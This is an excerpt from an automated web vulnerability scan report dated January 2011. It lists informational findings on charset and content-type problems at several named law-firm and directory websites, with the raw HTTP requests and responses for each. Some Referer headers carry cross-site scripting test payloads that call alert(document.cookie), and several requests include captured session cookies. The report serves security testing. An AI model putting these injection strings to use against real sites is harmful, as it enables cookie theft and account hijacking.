Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 19 Jan 2011 15:48:37 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

20.15. http://www.learnestateplanning.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.learnestateplanning.com
Path:   /

Request

GET / HTTP/1.1
Host: www.learnestateplanning.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 19 Jan 2011 16:43:19 GMT
Content-type: text/html
Connection: close

<html><head><title>LEARNESTATEPLANNING.COM</title><meta name="keywords" content=""</head><frameset rows="100%", *" border="0" frameborder="0"><frame src="http://sites.google.com/a/mayberrylawfirm.com/
...[SNIP]...

20.16. http://www.vault.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; JSESSIONID=00000-dJvfxGNM9UrnCQsyBDC18:140gkm3u6; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.5.8.1295451341966; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; _chartbeat2=1wcinl964s8aejot

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:36:14 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 29 Jul 2010 15:07:13 GMT
ETag: "a30d5e-288a-16cfca40"
Accept-Ranges: bytes
ntCoent-Length: 10378
Vary: User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: text/html
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:38:18 GMT;path=/
Content-Length: 10378


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="X-UA-Compatible" con
...[SNIP]...

21. HTML uses unrecognised charset  previous  next
There are 2 instances of this issue:

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing HTML content, the application should include within the Content-type header a directive specifying a standard recognised character set, for example charset=ISO-8859-1.


21.1. http://www.ebglaw.com/404.aspx  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ebglaw.com
Path:   /404.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /404.aspx HTTP/1.1
Host: www.ebglaw.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=mkavhri4srbzl255z4ebp2i3; __utmz=72265415.1295452418.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/27; __utma=72265415.606180877.1295452418.1295452418.1295452418.1; __utmc=72265415; __utmb=72265415.1.10.1295452418

Response

HTTP/1.1 404 Not Found
Date: Wed, 19 Jan 2011 15:53:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 56291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<meta name="google-site-verification" content="Vi9097zu70eGOFMSymjHqe9XRFgd-tFxmXE5JASBeHM" />
<meta http-equiv="Content-Type" content="text/html; charset=GB2312" />

<title>
...[SNIP]...

21.2. http://www.ebglaw.com/showoffice.aspx  previous  next

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.ebglaw.com
Path:   /showoffice.aspx

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directives were specified:

Request

GET /showoffice.aspx?Show=542 HTTP/1.1
Host: www.ebglaw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:48:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: ASP.NET_SessionId=uhd35155lvi11l45rc200ezs; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 63652

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head pro
...[SNIP]...
<meta name="google-site-verification" content="Vi9097zu70eGOFMSymjHqe9XRFgd-tFxmXE5JASBeHM" />
<meta http-equiv="Content-Type" content="text/html; charset=GB2312" />

<title>
...[SNIP]...

22. Content type incorrectly stated  previous  next
There are 10 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


22.1. http://lt.navegg.com/g.lt  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://lt.navegg.com
Path:   /g.lt

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /g.lt?nvst=12596&nvtt=z&nvup=1 HTTP/1.1
Host: lt.navegg.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
P3P: CP='CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR'
Set-Cookie: ltcid=547362597; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2013 11:57:37 GMT
Set-Cookie: inf= ; path=/; domain=.navegg.com; expires=Wed, 19-Jan-2011 15:57:37 GMT
Content-type: application/javascript
Date: Wed, 19 Jan 2011 17:57:37 GMT
Server: lighttpd/1.4.19
Content-Length: 43

tuple=" ";
ltload();
ltsetid("547362597");

22.2. http://twittercounter.com/embed/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://twittercounter.com
Path:   /embed/

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /embed/?username=rafaelp HTTP/1.1
Host: twittercounter.com
Proxy-Connection: keep-alive
Referer: http://rafael.adm.br/?ffb7d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E21b58676d82=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 17:57:36 GMT
Server: Apache/2.2.14 (Fedora) PHP/5.3.2
X-Powered-By: PHP/5.3.2
Expires: Sat, 29 Jan 2011 17:57:36 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 336

       <!--
       document.write( '<div id="TwitterCounter"><a href="http://twittercounter.com/rafaelp" title="TwitterCounter for @rafaelp" target="_blank"><img src="http://srv2.twittercounter.com/counter/inde
...[SNIP]...

22.3. http://v6test.cdn.att.net/special.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://v6test.cdn.att.net
Path:   /special.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /special.jpg HTTP/1.1
Host: v6test.cdn.att.net
Proxy-Connection: keep-alive
Referer: http://www.yellowpages.com/Washington-DC74302%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E9c7a66be0e0/Attorneys
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 18 Jan 2011 21:27:03 GMT
Server: Sun-ONE-Web-Server/6.1
Content-Length: 35
Content-Type: image/jpeg
P3p: policyref="http://www.corp.att.com/w3c/p3p.xml",CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR OTRi IND PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE GOV"
ETag: "2e413718-1a-23-4cb7067f"
Last-Modified: Thu, 14 Oct 2010 13:32:47 GMT
Accept-Ranges: bytes
X-Cache: HIT from 12.120.71.39
Cache-Control: max-age=2592000
Age: 15879
X-Cache: HIT from 12.120.79.19
Via: 1.1 12.120.71.39:80 (cache/2.6.2.2.16.ATT), 1.1 12.120.79.19:80 (cache/2.6.2.2.16.ATT)
Connection: keep-alive

GIF87a.............,...........L..;

22.4. http://wsdsapi.infospace.com/infomaster/widgets  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wsdsapi.infospace.com
Path:   /infomaster/widgets

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /infomaster/widgets?wid=pt&qkwid1=qkw&submitid1=sqkw HTTP/1.1
Host: wsdsapi.infospace.com
Proxy-Connection: keep-alive
Referer: http://www.info.com/washington%20dc%20law%20firms2ee2d%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253e72356283334
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:51:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=PgapVn1EAUuRePVjFvlFYwcvTOazzW42D5eIHH6piUwcdvq_V4SRYlK6ijKxtkcW8OMfUcCaxtJlWL8EdzErEAnKF_LukoLYq0q5jhT6yLmW31wIntrMqxy0narGTb0gkD094FWrtHGfsD0emWtUGf9JJWM2YNnr7chRn25YV24fvG5r0; expires=Fri, 14-Dec-2012 03:31:27 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qdazgl45ypx3f1qrme5x2145; path=/
Set-Cookie: DomainSession=TransactionId=84ceabcd16f34682b3c0c7deaeb7cb01&SessionId=158b74d0aee4477eab3fc7deaeb7cb01&ActionId=e1845d6a04044c2b87eec7deaeb7cb01&CookieDomain=.infospace.com; domain=.infospace.com; expires=Wed, 19-Jan-2011 17:11:27 GMT; path=/
Set-Cookie: DomainUserProfile=AnonymousId=0ef466e3216c4abc87c7c7deaeb7cb01&LastSeenDateTime=1/19/2011 4:51:27 PM&IssueDateTime=1/19/2011 4:51:27 PM&CookieDomain=.infospace.com; domain=.infospace.com; expires=Fri, 26-Dec-2110 16:51:27 GMT; path=/
Cache-Control: public
Expires: Wed, 19 Jan 2011 17:51:27 GMT
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


                                   // variable contructors
var txtElements = [{txt:'qkw',btn:'sqkw'}];var rfcIDElements = [];

// Disable autocomplete
var input1 = document.getElementById('qkw');input1.setAttribu
...[SNIP]...

22.5. http://www.arnoldporter.com//images/iTunesButton.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   //images/iTunesButton.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET //images/iTunesButton.jpg HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Referer: http://www.arnoldporter.com/multimedia.cfm?action=view&id=674&t=event
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263646; CFTOKEN=41801191; sifrFetch=true; __utmz=248117591.1295451783.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/18; __utma=248117591.1964504674.1295449755.1295449755.1295451783.2; __utmc=248117591; __utmb=248117591.1.10.1295451783

Response

HTTP/1.1 200 OK
Content-Length: 1221
Content-Type: image/jpeg
Content-Location: http://www.arnoldporter.com//images/iTunesButton.jpg
Last-Modified: Mon, 14 Jun 2010 13:24:55 GMT
Accept-Ranges: bytes
ETag: "802d3dfac4bcb1:53a7"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 19 Jan 2011 15:43:11 GMT

GIF89aM..............XEg............DFIyz}......deb.h.................................................kho......................d.....................................]__.w.......9:>......|s....%%$....
...[SNIP]...

22.6. http://www.fulbright.com/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.fulbright.com
Path:   /index.cfm

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /index.cfm?fuseaction=local.detail&site_id=299&link_name=Map and Directions HTTP/1.1
Host: www.fulbright.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=35971701; __utmz=148438816.1295449737.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24113095; __utma=148438816.1344999914.1295449737.1295449737.1295449737.1; __utmc=148438816; __utmb=148438816.1.10.1295449737; CFGLOBALS=urltoken%3DCFID%23%3D24113095%26CFTOKEN%23%3D35971701%23lastvisit%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A56%27%7D%23timecreated%3D%7Bts%20%272011%2D01%2D19%2009%3A08%3A46%27%7D%23hitcount%3D4%23cftoken%3D35971701%23cfid%3D24113095%23;

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Wed, 19 Jan 2011 15:48:37 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>

22.7. http://www.kasimer-ittig.com/domainserve/puview  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kasimer-ittig.com
Path:   /domainserve/puview

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /domainserve/puview?domain=kasimer-ittig.com HTTP/1.1
Host: www.kasimer-ittig.com
Proxy-Connection: keep-alive
Referer: http://www.kasimer-ittig.com/?pu=1
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: popunder=yes; hosting_session=52ceda8c57e646bed823849dab562c970a8346a5; __utmz=15642540.1295459825.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/37; __utma=15642540.1530514965.1295459825.1295459825.1295459825.1; __utmc=15642540; __utmb=15642540.1.10.1295459825

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 17:56:19 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Content-Length: 7
Content-Type: text/html; charset=utf-8

success

22.8. http://www.kasimer-ittig.com/domainserve/viewStats  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.kasimer-ittig.com
Path:   /domainserve/viewStats

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Request

POST /domainserve/viewStats?viewid=557099091&searchid=&dn=396380&ajax=1&numads=0 HTTP/1.1
Host: www.kasimer-ittig.com
Proxy-Connection: keep-alive
Referer: http://www.kasimer-ittig.com/?pu=1
Origin: http://www.kasimer-ittig.com
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: popunder=yes; hosting_session=52ceda8c57e646bed823849dab562c970a8346a5
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 17:56:15 GMT
Server: Apache/2.0.63 (Unix) PHP/5.2.10 mod_perl/2.0.4 Perl/v5.8.8
Vary: Accept-Language
Content-Length: 7
Content-Type: text/html; charset=utf-8

success

22.9. http://www.usdirectory.com/istat.aspx  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.usdirectory.com
Path:   /istat.aspx

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /istat.aspx?M=YPRESULT&C=1 HTTP/1.1
Host: www.usdirectory.com
Proxy-Connection: keep-alive
Referer: http://www.usdirectory.com/nypr.aspx?tbid=1&afid=1993&cc=54111051004ab29';alert(document.cookie)//2894fafc0c6&qs=TX&ct=&rg=&qhqn=&cr=3209505169
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Lng=en

Response

HTTP/1.1 200 OK
Cache-Control: private
Connection: close
Date: Wed, 19 Jan 2011 15:38:27 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Vary: Accept-Encoding
Content-Length: 810

var file='http://www.usdirectory.com/WebStat.asmx/GetXML4';
var u='' + escape(document.URL); var w=screen.width; var h=screen.height;
var f='' + escape(document.referrer);
if (navigator.a
...[SNIP]...

22.10. http://www.vault.com/com.vault.home.portlets/homepage_flash.swf  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.vault.com
Path:   /com.vault.home.portlets/homepage_flash.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /com.vault.home.portlets/homepage_flash.swf HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; __utmz=199986601.1295451341.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/7; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660; __utma=199986601.140982030.1295451341.1295451341.1295451341.1; __utmc=199986601; __utmb=199986601.3.8.1295451341966

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:26 GMT
Server: IBM_HTTP_Server
Last-Modified: Fri, 29 Jan 2010 19:03:12 GMT
Vary: User-Agent,Accept-Encoding
Content-Type: text/plain
Content-Language: en-US
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660;expires=Wed, 19-Jan-2011 15:37:30 GMT;path=/
Content-Length: 28093

CWS.....x....@T..0|......H.....E...#..,...V..H.5em.Q.(b....T......5..{.Q..`.1.$&.3s...K'.}.{.o....s..9...3sgf.A..@6..R.......w...F_...8.#...7.r.'.'$MMHQ.z$%...e&x..$d....ee.zD.P.2U9..h.?F.2....).Y.    ..
...[SNIP]...

23. Content type is not specified  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue description

If a web response does not specify a content type, then the browser will usually analyse the response and attempt to determine the MIME type of its content. This can have unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the absence of a content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:50:47 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 19 Jan 2011 15:50:47 GMT
Pragma: no-cache
Content-Length: 4543
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...

Report generated by CloudScan Vulnerability Crawler at Wed Jan 26 08:00:28 CST 2011.